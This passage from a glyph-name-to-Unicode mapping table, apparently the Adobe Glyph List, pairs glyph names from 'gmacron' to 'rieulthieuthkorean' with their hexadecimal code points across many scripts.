gmacron;1E21
gmonospace;FF47
gohiragana;3054
gokatakana;30B4
gparen;24A2
gpasquare;33AC
gradient;2207
grave;0060
gravebelowcmb;0316
gravecmb;0300
gravecomb;0300
gravedeva;0953
gravelowmod;02CE
gravemonospace;FF40
gravetonecmb;0340
greater;003E
greaterequal;2265
greaterequalorless;22DB
greatermonospace;FF1E
greaterorequivalent;2273
greaterorless;2277
greateroverequal;2267
greatersmall;FE65
gscript;0261
gstroke;01E5
guhiragana;3050
guillemotleft;00AB
guillemotright;00BB
guilsinglleft;2039
guilsinglright;203A
gukatakana;30B0
guramusquare;3318
gysquare;33C9
h;0068
haabkhasiancyrillic;04A9
haaltonearabic;06C1
habengali;09B9
hadescendercyrillic;04B3
hadeva;0939
hagujarati;0AB9
hagurmukhi;0A39
haharabic;062D
hahfinalarabic;FEA2
hahinitialarabic;FEA3
hahiragana;306F
hahmedialarabic;FEA4
haitusquare;332A
hakatakana;30CF
hakatakanahalfwidth;FF8A
halantgurmukhi;0A4D
hamzaarabic;0621
hamzadammaarabic;0621 064F
hamzadammatanarabic;0621 064C
hamzafathaarabic;0621 064E
hamzafathatanarabic;0621 064B
hamzalowarabic;0621
hamzalowkasraarabic;0621 0650
hamzalowkasratanarabic;0621 064D
hamzasukunarabic;0621 0652
hangulfiller;3164
hardsigncyrillic;044A
harpoonleftbarbup;21BC
harpoonrightbarbup;21C0
hasquare;33CA
hatafpatah;05B2
hatafpatah16;05B2
hatafpatah23;05B2
hatafpatah2f;05B2
hatafpatahhebrew;05B2
hatafpatahnarrowhebrew;05B2
hatafpatahquarterhebrew;05B2
hatafpatahwidehebrew;05B2
hatafqamats;05B3
hatafqamats1b;05B3
hatafqamats28;05B3
hatafqamats34;05B3
hatafqamatshebrew;05B3
hatafqamatsnarrowhebrew;05B3
hatafqamatsquarterhebrew;05B3
hatafqamatswidehebrew;05B3
hatafsegol;05B1
hatafsegol17;05B1
hatafsegol24;05B1
hatafsegol30;05B1
hatafsegolhebrew;05B1
hatafsegolnarrowhebrew;05B1
hatafsegolquarterhebrew;05B1
hatafsegolwidehebrew;05B1
hbar;0127
hbopomofo;310F
hbrevebelow;1E2B
hcedilla;1E29
hcircle;24D7
hcircumflex;0125
hdieresis;1E27
hdotaccent;1E23
hdotbelow;1E25
he;05D4
heart;2665
heartsuitblack;2665
heartsuitwhite;2661
hedagesh;FB34
hedageshhebrew;FB34
hehaltonearabic;06C1
heharabic;0647
hehebrew;05D4
hehfinalaltonearabic;FBA7
hehfinalalttwoarabic;FEEA
hehfinalarabic;FEEA
hehhamzaabovefinalarabic;FBA5
hehhamzaaboveisolatedarabic;FBA4
hehinitialaltonearabic;FBA8
hehinitialarabic;FEEB
hehiragana;3078
hehmedialaltonearabic;FBA9
hehmedialarabic;FEEC
heiseierasquare;337B
hekatakana;30D8
hekatakanahalfwidth;FF8D
hekutaarusquare;3336
henghook;0267
herutusquare;3339
het;05D7
hethebrew;05D7
hhook;0266
hhooksuperior;02B1
hieuhacirclekorean;327B
hieuhaparenkorean;321B
hieuhcirclekorean;326D
hieuhkorean;314E
hieuhparenkorean;320D
hihiragana;3072
hikatakana;30D2
hikatakanahalfwidth;FF8B
hiriq;05B4
hiriq14;05B4
hiriq21;05B4
hiriq2d;05B4
hiriqhebrew;05B4
hiriqnarrowhebrew;05B4
hiriqquarterhebrew;05B4
hiriqwidehebrew;05B4
hlinebelow;1E96
hmonospace;FF48
hoarmenian;0570
hohipthai;0E2B
hohiragana;307B
hokatakana;30DB
hokatakanahalfwidth;FF8E
holam;05B9
holam19;05B9
holam26;05B9
holam32;05B9
holamhebrew;05B9
holamnarrowhebrew;05B9
holamquarterhebrew;05B9
holamwidehebrew;05B9
honokhukthai;0E2E
hookabovecomb;0309
hookcmb;0309
hookpalatalizedbelowcmb;0321
hookretroflexbelowcmb;0322
hoonsquare;3342
horicoptic;03E9
horizontalbar;2015
horncmb;031B
hotsprings;2668
house;2302
hparen;24A3
hsuperior;02B0
hturned;0265
huhiragana;3075
huiitosquare;3333
hukatakana;30D5
hukatakanahalfwidth;FF8C
hungarumlaut;02DD
hungarumlautcmb;030B
hv;0195
hyphen;002D
hypheninferior;F6E5
hyphenmonospace;FF0D
hyphensmall;FE63
hyphensuperior;F6E6
hyphentwo;2010
i;0069
iacute;00ED
iacyrillic;044F
ibengali;0987
ibopomofo;3127
ibreve;012D
icaron;01D0
icircle;24D8
icircumflex;00EE
icyrillic;0456
idblgrave;0209
ideographearthcircle;328F
ideographfirecircle;328B
ideographicallianceparen;323F
ideographiccallparen;323A
ideographiccentrecircle;32A5
ideographicclose;3006
ideographiccomma;3001
ideographiccommaleft;FF64
ideographiccongratulationparen;3237
ideographiccorrectcircle;32A3
ideographicearthparen;322F
ideographicenterpriseparen;323D
ideographicexcellentcircle;329D
ideographicfestivalparen;3240
ideographicfinancialcircle;3296
ideographicfinancialparen;3236
ideographicfireparen;322B
ideographichaveparen;3232
ideographichighcircle;32A4
ideographiciterationmark;3005
ideographiclaborcircle;3298
ideographiclaborparen;3238
ideographicleftcircle;32A7
ideographiclowcircle;32A6
ideographicmedicinecircle;32A9
ideographicmetalparen;322E
ideographicmoonparen;322A
ideographicnameparen;3234
ideographicperiod;3002
ideographicprintcircle;329E
ideographicreachparen;3243
ideographicrepresentparen;3239
ideographicresourceparen;323E
ideographicrightcircle;32A8
ideographicsecretcircle;3299
ideographicselfparen;3242
ideographicsocietyparen;3233
ideographicspace;3000
ideographicspecialparen;3235
ideographicstockparen;3231
ideographicstudyparen;323B
ideographicsunparen;3230
ideographicsuperviseparen;323C
ideographicwaterparen;322C
ideographicwoodparen;322D
ideographiczero;3007
ideographmetalcircle;328E
ideographmooncircle;328A
ideographnamecircle;3294
ideographsuncircle;3290
ideographwatercircle;328C
ideographwoodcircle;328D
ideva;0907
idieresis;00EF
idieresisacute;1E2F
idieresiscyrillic;04E5
idotbelow;1ECB
iebrevecyrillic;04D7
iecyrillic;0435
ieungacirclekorean;3275
ieungaparenkorean;3215
ieungcirclekorean;3267
ieungkorean;3147
ieungparenkorean;3207
igrave;00EC
igujarati;0A87
igurmukhi;0A07
ihiragana;3044
ihookabove;1EC9
iibengali;0988
iicyrillic;0438
iideva;0908
iigujarati;0A88
iigurmukhi;0A08
iimatragurmukhi;0A40
iinvertedbreve;020B
iishortcyrillic;0439
iivowelsignbengali;09C0
iivowelsigndeva;0940
iivowelsigngujarati;0AC0
ij;0133
ikatakana;30A4
ikatakanahalfwidth;FF72
ikorean;3163
ilde;02DC
iluyhebrew;05AC
imacron;012B
imacroncyrillic;04E3
imageorapproximatelyequal;2253
imatragurmukhi;0A3F
imonospace;FF49
increment;2206
infinity;221E
iniarmenian;056B
integral;222B
integralbottom;2321
integralbt;2321
integralex;F8F5
integraltop;2320
integraltp;2320
intersection;2229
intisquare;3305
invbullet;25D8
invcircle;25D9
invsmileface;263B
iocyrillic;0451
iogonek;012F
iota;03B9
iotadieresis;03CA
iotadieresistonos;0390
iotalatin;0269
iotatonos;03AF
iparen;24A4
irigurmukhi;0A72
ismallhiragana;3043
ismallkatakana;30A3
ismallkatakanahalfwidth;FF68
issharbengali;09FA
istroke;0268
isuperior;F6ED
iterationhiragana;309D
iterationkatakana;30FD
itilde;0129
itildebelow;1E2D
iubopomofo;3129
iucyrillic;044E
ivowelsignbengali;09BF
ivowelsigndeva;093F
ivowelsigngujarati;0ABF
izhitsacyrillic;0475
izhitsadblgravecyrillic;0477
j;006A
jaarmenian;0571
jabengali;099C
jadeva;091C
jagujarati;0A9C
jagurmukhi;0A1C
jbopomofo;3110
jcaron;01F0
jcircle;24D9
jcircumflex;0135
jcrossedtail;029D
jdotlessstroke;025F
jecyrillic;0458
jeemarabic;062C
jeemfinalarabic;FE9E
jeeminitialarabic;FE9F
jeemmedialarabic;FEA0
jeharabic;0698
jehfinalarabic;FB8B
jhabengali;099D
jhadeva;091D
jhagujarati;0A9D
jhagurmukhi;0A1D
jheharmenian;057B
jis;3004
jmonospace;FF4A
jparen;24A5
jsuperior;02B2
k;006B
kabashkircyrillic;04A1
kabengali;0995
kacute;1E31
kacyrillic;043A
kadescendercyrillic;049B
kadeva;0915
kaf;05DB
kafarabic;0643
kafdagesh;FB3B
kafdageshhebrew;FB3B
kaffinalarabic;FEDA
kafhebrew;05DB
kafinitialarabic;FEDB
kafmedialarabic;FEDC
kafrafehebrew;FB4D
kagujarati;0A95
kagurmukhi;0A15
kahiragana;304B
kahookcyrillic;04C4
kakatakana;30AB
kakatakanahalfwidth;FF76
kappa;03BA
kappasymbolgreek;03F0
kapyeounmieumkorean;3171
kapyeounphieuphkorean;3184
kapyeounpieupkorean;3178
kapyeounssangpieupkorean;3179
karoriisquare;330D
kashidaautoarabic;0640
kashidaautonosidebearingarabic;0640
kasmallkatakana;30F5
kasquare;3384
kasraarabic;0650
kasratanarabic;064D
kastrokecyrillic;049F
katahiraprolongmarkhalfwidth;FF70
kaverticalstrokecyrillic;049D
kbopomofo;310E
kcalsquare;3389
kcaron;01E9
kcedilla;0137
kcircle;24DA
kcommaaccent;0137
kdotbelow;1E33
keharmenian;0584
kehiragana;3051
kekatakana;30B1
kekatakanahalfwidth;FF79
kenarmenian;056F
kesmallkatakana;30F6
kgreenlandic;0138
khabengali;0996
khacyrillic;0445
khadeva;0916
khagujarati;0A96
khagurmukhi;0A16
khaharabic;062E
khahfinalarabic;FEA6
khahinitialarabic;FEA7
khahmedialarabic;FEA8
kheicoptic;03E7
khhadeva;0959
khhagurmukhi;0A59
khieukhacirclekorean;3278
khieukhaparenkorean;3218
khieukhcirclekorean;326A
khieukhkorean;314B
khieukhparenkorean;320A
khokhaithai;0E02
khokhonthai;0E05
khokhuatthai;0E03
khokhwaithai;0E04
khomutthai;0E5B
khook;0199
khorakhangthai;0E06
khzsquare;3391
kihiragana;304D
kikatakana;30AD
kikatakanahalfwidth;FF77
kiroguramusquare;3315
kiromeetorusquare;3316
kirosquare;3314
kiyeokacirclekorean;326E
kiyeokaparenkorean;320E
kiyeokcirclekorean;3260
kiyeokkorean;3131
kiyeokparenkorean;3200
kiyeoksioskorean;3133
kjecyrillic;045C
klinebelow;1E35
klsquare;3398
kmcubedsquare;33A6
kmonospace;FF4B
kmsquaredsquare;33A2
kohiragana;3053
kohmsquare;33C0
kokaithai;0E01
kokatakana;30B3
kokatakanahalfwidth;FF7A
kooposquare;331E
koppacyrillic;0481
koreanstandardsymbol;327F
koroniscmb;0343
kparen;24A6
kpasquare;33AA
ksicyrillic;046F
ktsquare;33CF
kturned;029E
kuhiragana;304F
kukatakana;30AF
kukatakanahalfwidth;FF78
kvsquare;33B8
kwsquare;33BE
l;006C
labengali;09B2
lacute;013A
ladeva;0932
lagujarati;0AB2
lagurmukhi;0A32
lakkhangyaothai;0E45
lamaleffinalarabic;FEFC
lamalefhamzaabovefinalarabic;FEF8
lamalefhamzaaboveisolatedarabic;FEF7
lamalefhamzabelowfinalarabic;FEFA
lamalefhamzabelowisolatedarabic;FEF9
lamalefisolatedarabic;FEFB
lamalefmaddaabovefinalarabic;FEF6
lamalefmaddaaboveisolatedarabic;FEF5
lamarabic;0644
lambda;03BB
lambdastroke;019B
lamed;05DC
lameddagesh;FB3C
lameddageshhebrew;FB3C
lamedhebrew;05DC
lamedholam;05DC 05B9
lamedholamdagesh;05DC 05B9 05BC
lamedholamdageshhebrew;05DC 05B9 05BC
lamedholamhebrew;05DC 05B9
lamfinalarabic;FEDE
lamhahinitialarabic;FCCA
laminitialarabic;FEDF
lamjeeminitialarabic;FCC9
lamkhahinitialarabic;FCCB
lamlamhehisolatedarabic;FDF2
lammedialarabic;FEE0
lammeemhahinitialarabic;FD88
lammeeminitialarabic;FCCC
lammeemjeeminitialarabic;FEDF FEE4 FEA0
lammeemkhahinitialarabic;FEDF FEE4 FEA8
largecircle;25EF
lbar;019A
lbelt;026C
lbopomofo;310C
lcaron;013E
lcedilla;013C
lcircle;24DB
lcircumflexbelow;1E3D
lcommaaccent;013C
ldot;0140
ldotaccent;0140
ldotbelow;1E37
ldotbelowmacron;1E39
leftangleabovecmb;031A
lefttackbelowcmb;0318
less;003C
lessequal;2264
lessequalorgreater;22DA
lessmonospace;FF1C
lessorequivalent;2272
lessorgreater;2276
lessoverequal;2266
lesssmall;FE64
lezh;026E
lfblock;258C
lhookretroflex;026D
lira;20A4
liwnarmenian;056C
lj;01C9
ljecyrillic;0459
ll;F6C0
lladeva;0933
llagujarati;0AB3
llinebelow;1E3B
llladeva;0934
llvocalicbengali;09E1
llvocalicdeva;0961
llvocalicvowelsignbengali;09E3
llvocalicvowelsigndeva;0963
lmiddletilde;026B
lmonospace;FF4C
lmsquare;33D0
lochulathai;0E2C
logicaland;2227
logicalnot;00AC
logicalnotreversed;2310
logicalor;2228
lolingthai;0E25
longs;017F
lowlinecenterline;FE4E
lowlinecmb;0332
lowlinedashed;FE4D
lozenge;25CA
lparen;24A7
lslash;0142
lsquare;2113
lsuperior;F6EE
ltshade;2591
luthai;0E26
lvocalicbengali;098C
lvocalicdeva;090C
lvocalicvowelsignbengali;09E2
lvocalicvowelsigndeva;0962
lxsquare;33D3
m;006D
mabengali;09AE
macron;00AF
macronbelowcmb;0331
macroncmb;0304
macronlowmod;02CD
macronmonospace;FFE3
macute;1E3F
madeva;092E
magujarati;0AAE
magurmukhi;0A2E
mahapakhhebrew;05A4
mahapakhlefthebrew;05A4
mahiragana;307E
maichattawalowleftthai;F895
maichattawalowrightthai;F894
maichattawathai;0E4B
maichattawaupperleftthai;F893
maieklowleftthai;F88C
maieklowrightthai;F88B
maiekthai;0E48
maiekupperleftthai;F88A
maihanakatleftthai;F884
maihanakatthai;0E31
maitaikhuleftthai;F889
maitaikhuthai;0E47
maitholowleftthai;F88F
maitholowrightthai;F88E
maithothai;0E49
maithoupperleftthai;F88D
maitrilowleftthai;F892
maitrilowrightthai;F891
maitrithai;0E4A
maitriupperleftthai;F890
maiyamokthai;0E46
makatakana;30DE
makatakanahalfwidth;FF8F
male;2642
mansyonsquare;3347
maqafhebrew;05BE
mars;2642
masoracirclehebrew;05AF
masquare;3383
mbopomofo;3107
mbsquare;33D4
mcircle;24DC
mcubedsquare;33A5
mdotaccent;1E41
mdotbelow;1E43
meemarabic;0645
meemfinalarabic;FEE2
meeminitialarabic;FEE3
meemmedialarabic;FEE4
meemmeeminitialarabic;FCD1
meemmeemisolatedarabic;FC48
meetorusquare;334D
mehiragana;3081
meizierasquare;337E
mekatakana;30E1
mekatakanahalfwidth;FF92
mem;05DE
memdagesh;FB3E
memdageshhebrew;FB3E
memhebrew;05DE
menarmenian;0574
merkhahebrew;05A5
merkhakefulahebrew;05A6
merkhakefulalefthebrew;05A6
merkhalefthebrew;05A5
mhook;0271
mhzsquare;3392
middledotkatakanahalfwidth;FF65
middot;00B7
mieumacirclekorean;3272
mieumaparenkorean;3212
mieumcirclekorean;3264
mieumkorean;3141
mieumpansioskorean;3170
mieumparenkorean;3204
mieumpieupkorean;316E
mieumsioskorean;316F
mihiragana;307F
mikatakana;30DF
mikatakanahalfwidth;FF90
minus;2212
minusbelowcmb;0320
minuscircle;2296
minusmod;02D7
minusplus;2213
minute;2032
miribaarusquare;334A
mirisquare;3349
mlonglegturned;0270
mlsquare;3396
mmcubedsquare;33A3
mmonospace;FF4D
mmsquaredsquare;339F
mohiragana;3082
mohmsquare;33C1
mokatakana;30E2
mokatakanahalfwidth;FF93
molsquare;33D6
momathai;0E21
moverssquare;33A7
moverssquaredsquare;33A8
mparen;24A8
mpasquare;33AB
mssquare;33B3
msuperior;F6EF
mturned;026F
mu;00B5
mu1;00B5
muasquare;3382
muchgreater;226B
muchless;226A
mufsquare;338C
mugreek;03BC
mugsquare;338D
muhiragana;3080
mukatakana;30E0
mukatakanahalfwidth;FF91
mulsquare;3395
multiply;00D7
mumsquare;339B
munahhebrew;05A3
munahlefthebrew;05A3
musicalnote;266A
musicalnotedbl;266B
musicflatsign;266D
musicsharpsign;266F
mussquare;33B2
muvsquare;33B6
muwsquare;33BC
mvmegasquare;33B9
mvsquare;33B7
mwmegasquare;33BF
mwsquare;33BD
n;006E
nabengali;09A8
nabla;2207
nacute;0144
nadeva;0928
nagujarati;0AA8
nagurmukhi;0A28
nahiragana;306A
nakatakana;30CA
nakatakanahalfwidth;FF85
napostrophe;0149
nasquare;3381
nbopomofo;310B
nbspace;00A0
ncaron;0148
ncedilla;0146
ncircle;24DD
ncircumflexbelow;1E4B
ncommaaccent;0146
ndotaccent;1E45
ndotbelow;1E47
nehiragana;306D
nekatakana;30CD
nekatakanahalfwidth;FF88
newsheqelsign;20AA
nfsquare;338B
ngabengali;0999
ngadeva;0919
ngagujarati;0A99
ngagurmukhi;0A19
ngonguthai;0E07
nhiragana;3093
nhookleft;0272
nhookretroflex;0273
nieunacirclekorean;326F
nieunaparenkorean;320F
nieuncieuckorean;3135
nieuncirclekorean;3261
nieunhieuhkorean;3136
nieunkorean;3134
nieunpansioskorean;3168
nieunparenkorean;3201
nieunsioskorean;3167
nieuntikeutkorean;3166
nihiragana;306B
nikatakana;30CB
nikatakanahalfwidth;FF86
nikhahitleftthai;F899
nikhahitthai;0E4D
nine;0039
ninearabic;0669
ninebengali;09EF
ninecircle;2468
ninecircleinversesansserif;2792
ninedeva;096F
ninegujarati;0AEF
ninegurmukhi;0A6F
ninehackarabic;0669
ninehangzhou;3029
nineideographicparen;3228
nineinferior;2089
ninemonospace;FF19
nineoldstyle;F739
nineparen;247C
nineperiod;2490
ninepersian;06F9
nineroman;2178
ninesuperior;2079
nineteencircle;2472
nineteenparen;2486
nineteenperiod;249A
ninethai;0E59
nj;01CC
njecyrillic;045A
nkatakana;30F3
nkatakanahalfwidth;FF9D
nlegrightlong;019E
nlinebelow;1E49
nmonospace;FF4E
nmsquare;339A
nnabengali;09A3
nnadeva;0923
nnagujarati;0AA3
nnagurmukhi;0A23
nnnadeva;0929
nohiragana;306E
nokatakana;30CE
nokatakanahalfwidth;FF89
nonbreakingspace;00A0
nonenthai;0E13
nonuthai;0E19
noonarabic;0646
noonfinalarabic;FEE6
noonghunnaarabic;06BA
noonghunnafinalarabic;FB9F
noonhehinitialarabic;FEE7 FEEC
nooninitialarabic;FEE7
noonjeeminitialarabic;FCD2
noonjeemisolatedarabic;FC4B
noonmedialarabic;FEE8
noonmeeminitialarabic;FCD5
noonmeemisolatedarabic;FC4E
noonnoonfinalarabic;FC8D
notcontains;220C
notelement;2209
notelementof;2209
notequal;2260
notgreater;226F
notgreaternorequal;2271
notgreaternorless;2279
notidentical;2262
notless;226E
notlessnorequal;2270
notparallel;2226
notprecedes;2280
notsubset;2284
notsucceeds;2281
notsuperset;2285
nowarmenian;0576
nparen;24A9
nssquare;33B1
nsuperior;207F
ntilde;00F1
nu;03BD
nuhiragana;306C
nukatakana;30CC
nukatakanahalfwidth;FF87
nuktabengali;09BC
nuktadeva;093C
nuktagujarati;0ABC
nuktagurmukhi;0A3C
numbersign;0023
numbersignmonospace;FF03
numbersignsmall;FE5F
numeralsigngreek;0374
numeralsignlowergreek;0375
numero;2116
nun;05E0
nundagesh;FB40
nundageshhebrew;FB40
nunhebrew;05E0
nvsquare;33B5
nwsquare;33BB
nyabengali;099E
nyadeva;091E
nyagujarati;0A9E
nyagurmukhi;0A1E
o;006F
oacute;00F3
oangthai;0E2D
obarred;0275
obarredcyrillic;04E9
obarreddieresiscyrillic;04EB
obengali;0993
obopomofo;311B
obreve;014F
ocandradeva;0911
ocandragujarati;0A91
ocandravowelsigndeva;0949
ocandravowelsigngujarati;0AC9
ocaron;01D2
ocircle;24DE
ocircumflex;00F4
ocircumflexacute;1ED1
ocircumflexdotbelow;1ED9
ocircumflexgrave;1ED3
ocircumflexhookabove;1ED5
ocircumflextilde;1ED7
ocyrillic;043E
odblacute;0151
odblgrave;020D
odeva;0913
odieresis;00F6
odieresiscyrillic;04E7
odotbelow;1ECD
oe;0153
oekorean;315A
ogonek;02DB
ogonekcmb;0328
ograve;00F2
ogujarati;0A93
oharmenian;0585
ohiragana;304A
ohookabove;1ECF
ohorn;01A1
ohornacute;1EDB
ohorndotbelow;1EE3
ohorngrave;1EDD
ohornhookabove;1EDF
ohorntilde;1EE1
ohungarumlaut;0151
oi;01A3
oinvertedbreve;020F
okatakana;30AA
okatakanahalfwidth;FF75
okorean;3157
olehebrew;05AB
omacron;014D
omacronacute;1E53
omacrongrave;1E51
omdeva;0950
omega;03C9
omega1;03D6
omegacyrillic;0461
omegalatinclosed;0277
omegaroundcyrillic;047B
omegatitlocyrillic;047D
omegatonos;03CE
omgujarati;0AD0
omicron;03BF
omicrontonos;03CC
omonospace;FF4F
one;0031
onearabic;0661
onebengali;09E7
onecircle;2460
onecircleinversesansserif;278A
onedeva;0967
onedotenleader;2024
oneeighth;215B
onefitted;F6DC
onegujarati;0AE7
onegurmukhi;0A67
onehackarabic;0661
onehalf;00BD
onehangzhou;3021
oneideographicparen;3220
oneinferior;2081
onemonospace;FF11
onenumeratorbengali;09F4
oneoldstyle;F731
oneparen;2474
oneperiod;2488
onepersian;06F1
onequarter;00BC
oneroman;2170
onesuperior;00B9
onethai;0E51
onethird;2153
oogonek;01EB
oogonekmacron;01ED
oogurmukhi;0A13
oomatragurmukhi;0A4B
oopen;0254
oparen;24AA
openbullet;25E6
option;2325
ordfeminine;00AA
ordmasculine;00BA
orthogonal;221F
oshortdeva;0912
oshortvowelsigndeva;094A
oslash;00F8
oslashacute;01FF
osmallhiragana;3049
osmallkatakana;30A9
osmallkatakanahalfwidth;FF6B
ostrokeacute;01FF
osuperior;F6F0
otcyrillic;047F
otilde;00F5
otildeacute;1E4D
otildedieresis;1E4F
oubopomofo;3121
overline;203E
overlinecenterline;FE4A
overlinecmb;0305
overlinedashed;FE49
overlinedblwavy;FE4C
overlinewavy;FE4B
overscore;00AF
ovowelsignbengali;09CB
ovowelsigndeva;094B
ovowelsigngujarati;0ACB
p;0070
paampssquare;3380
paasentosquare;332B
pabengali;09AA
pacute;1E55
padeva;092A
pagedown;21DF
pageup;21DE
pagujarati;0AAA
pagurmukhi;0A2A
pahiragana;3071
paiyannoithai;0E2F
pakatakana;30D1
palatalizationcyrilliccmb;0484
palochkacyrillic;04C0
pansioskorean;317F
paragraph;00B6
parallel;2225
parenleft;0028
parenleftaltonearabic;FD3E
parenleftbt;F8ED
parenleftex;F8EC
parenleftinferior;208D
parenleftmonospace;FF08
parenleftsmall;FE59
parenleftsuperior;207D
parenlefttp;F8EB
parenleftvertical;FE35
parenright;0029
parenrightaltonearabic;FD3F
parenrightbt;F8F8
parenrightex;F8F7
parenrightinferior;208E
parenrightmonospace;FF09
parenrightsmall;FE5A
parenrightsuperior;207E
parenrighttp;F8F6
parenrightvertical;FE36
partialdiff;2202
paseqhebrew;05C0
pashtahebrew;0599
pasquare;33A9
patah;05B7
patah11;05B7
patah1d;05B7
patah2a;05B7
patahhebrew;05B7
patahnarrowhebrew;05B7
patahquarterhebrew;05B7
patahwidehebrew;05B7
pazerhebrew;05A1
pbopomofo;3106
pcircle;24DF
pdotaccent;1E57
pe;05E4
pecyrillic;043F
pedagesh;FB44
pedageshhebrew;FB44
peezisquare;333B
pefinaldageshhebrew;FB43
peharabic;067E
peharmenian;057A
pehebrew;05E4
pehfinalarabic;FB57
pehinitialarabic;FB58
pehiragana;307A
pehmedialarabic;FB59
pekatakana;30DA
pemiddlehookcyrillic;04A7
perafehebrew;FB4E
percent;0025
percentarabic;066A
percentmonospace;FF05
percentsmall;FE6A
period;002E
periodarmenian;0589
periodcentered;00B7
periodhalfwidth;FF61
periodinferior;F6E7
periodmonospace;FF0E
periodsmall;FE52
periodsuperior;F6E8
perispomenigreekcmb;0342
perpendicular;22A5
perthousand;2030
peseta;20A7
pfsquare;338A
phabengali;09AB
phadeva;092B
phagujarati;0AAB
phagurmukhi;0A2B
phi;03C6
phi1;03D5
phieuphacirclekorean;327A
phieuphaparenkorean;321A
phieuphcirclekorean;326C
phieuphkorean;314D
phieuphparenkorean;320C
philatin;0278
phinthuthai;0E3A
phisymbolgreek;03D5
phook;01A5
phophanthai;0E1E
phophungthai;0E1C
phosamphaothai;0E20
pi;03C0
pieupacirclekorean;3273
pieupaparenkorean;3213
pieupcieuckorean;3176
pieupcirclekorean;3265
pieupkiyeokkorean;3172
pieupkorean;3142
pieupparenkorean;3205
pieupsioskiyeokkorean;3174
pieupsioskorean;3144
pieupsiostikeutkorean;3175
pieupthieuthkorean;3177
pieuptikeutkorean;3173
pihiragana;3074
pikatakana;30D4
pisymbolgreek;03D6
piwrarmenian;0583
plus;002B
plusbelowcmb;031F
pluscircle;2295
plusminus;00B1
plusmod;02D6
plusmonospace;FF0B
plussmall;FE62
plussuperior;207A
pmonospace;FF50
pmsquare;33D8
pohiragana;307D
pointingindexdownwhite;261F
pointingindexleftwhite;261C
pointingindexrightwhite;261E
pointingindexupwhite;261D
pokatakana;30DD
poplathai;0E1B
postalmark;3012
postalmarkface;3020
pparen;24AB
precedes;227A
prescription;211E
primemod;02B9
primereversed;2035
product;220F
projective;2305
prolongedkana;30FC
propellor;2318
propersubset;2282
propersuperset;2283
proportion;2237
proportional;221D
psi;03C8
psicyrillic;0471
psilipneumatacyrilliccmb;0486
pssquare;33B0
puhiragana;3077
pukatakana;30D7
pvsquare;33B4
pwsquare;33BA
q;0071
qadeva;0958
qadmahebrew;05A8
qafarabic;0642
qaffinalarabic;FED6
qafinitialarabic;FED7
qafmedialarabic;FED8
qamats;05B8
qamats10;05B8
qamats1a;05B8
qamats1c;05B8
qamats27;05B8
qamats29;05B8
qamats33;05B8
qamatsde;05B8
qamatshebrew;05B8
qamatsnarrowhebrew;05B8
qamatsqatanhebrew;05B8
qamatsqatannarrowhebrew;05B8
qamatsqatanquarterhebrew;05B8
qamatsqatanwidehebrew;05B8
qamatsquarterhebrew;05B8
qamatswidehebrew;05B8
qarneyparahebrew;059F
qbopomofo;3111
qcircle;24E0
qhook;02A0
qmonospace;FF51
qof;05E7
qofdagesh;FB47
qofdageshhebrew;FB47
qofhatafpatah;05E7 05B2
qofhatafpatahhebrew;05E7 05B2
qofhatafsegol;05E7 05B1
qofhatafsegolhebrew;05E7 05B1
qofhebrew;05E7
qofhiriq;05E7 05B4
qofhiriqhebrew;05E7 05B4
qofholam;05E7 05B9
qofholamhebrew;05E7 05B9
qofpatah;05E7 05B7
qofpatahhebrew;05E7 05B7
qofqamats;05E7 05B8
qofqamatshebrew;05E7 05B8
qofqubuts;05E7 05BB
qofqubutshebrew;05E7 05BB
qofsegol;05E7 05B6
qofsegolhebrew;05E7 05B6
qofsheva;05E7 05B0
qofshevahebrew;05E7 05B0
qoftsere;05E7 05B5
qoftserehebrew;05E7 05B5
qparen;24AC
quarternote;2669
qubuts;05BB
qubuts18;05BB
qubuts25;05BB
qubuts31;05BB
qubutshebrew;05BB
qubutsnarrowhebrew;05BB
qubutsquarterhebrew;05BB
qubutswidehebrew;05BB
question;003F
questionarabic;061F
questionarmenian;055E
questiondown;00BF
questiondownsmall;F7BF
questiongreek;037E
questionmonospace;FF1F
questionsmall;F73F
quotedbl;0022
quotedblbase;201E
quotedblleft;201C
quotedblmonospace;FF02
quotedblprime;301E
quotedblprimereversed;301D
quotedblright;201D
quoteleft;2018
quoteleftreversed;201B
quotereversed;201B
quoteright;2019
quoterightn;0149
quotesinglbase;201A
quotesingle;0027
quotesinglemonospace;FF07
r;0072
raarmenian;057C
rabengali;09B0
racute;0155
radeva;0930
radical;221A
radicalex;F8E5
radoverssquare;33AE
radoverssquaredsquare;33AF
radsquare;33AD
rafe;05BF
rafehebrew;05BF
ragujarati;0AB0
ragurmukhi;0A30
rahiragana;3089
rakatakana;30E9
rakatakanahalfwidth;FF97
ralowerdiagonalbengali;09F1
ramiddlediagonalbengali;09F0
ramshorn;0264
ratio;2236
rbopomofo;3116
rcaron;0159
rcedilla;0157
rcircle;24E1
rcommaaccent;0157
rdblgrave;0211
rdotaccent;1E59
rdotbelow;1E5B
rdotbelowmacron;1E5D
referencemark;203B
reflexsubset;2286
reflexsuperset;2287
registered;00AE
registersans;F8E8
registerserif;F6DA
reharabic;0631
reharmenian;0580
rehfinalarabic;FEAE
rehiragana;308C
rehyehaleflamarabic;0631 FEF3 FE8E 0644
rekatakana;30EC
rekatakanahalfwidth;FF9A
resh;05E8
reshdageshhebrew;FB48
reshhatafpatah;05E8 05B2
reshhatafpatahhebrew;05E8 05B2
reshhatafsegol;05E8 05B1
reshhatafsegolhebrew;05E8 05B1
reshhebrew;05E8
reshhiriq;05E8 05B4
reshhiriqhebrew;05E8 05B4
reshholam;05E8 05B9
reshholamhebrew;05E8 05B9
reshpatah;05E8 05B7
reshpatahhebrew;05E8 05B7
reshqamats;05E8 05B8
reshqamatshebrew;05E8 05B8
reshqubuts;05E8 05BB
reshqubutshebrew;05E8 05BB
reshsegol;05E8 05B6
reshsegolhebrew;05E8 05B6
reshsheva;05E8 05B0
reshshevahebrew;05E8 05B0
reshtsere;05E8 05B5
reshtserehebrew;05E8 05B5
reversedtilde;223D
reviahebrew;0597
reviamugrashhebrew;0597
revlogicalnot;2310
rfishhook;027E
rfishhookreversed;027F
rhabengali;09DD
rhadeva;095D
rho;03C1
rhook;027D
rhookturned;027B
rhookturnedsuperior;02B5
rhosymbolgreek;03F1
rhotichookmod;02DE
rieulacirclekorean;3271
rieulaparenkorean;3211
rieulcirclekorean;3263
rieulhieuhkorean;3140
rieulkiyeokkorean;313A
rieulkiyeoksioskorean;3169
rieulkorean;3139
rieulmieumkorean;313B
rieulpansioskorean;316C
rieulparenkorean;3203
rieulphieuphkorean;313F
rieulpieupkorean;313C
rieulpieupsioskorean;316B
rieulsioskorean;313D
rieulthieuthkorean;313E
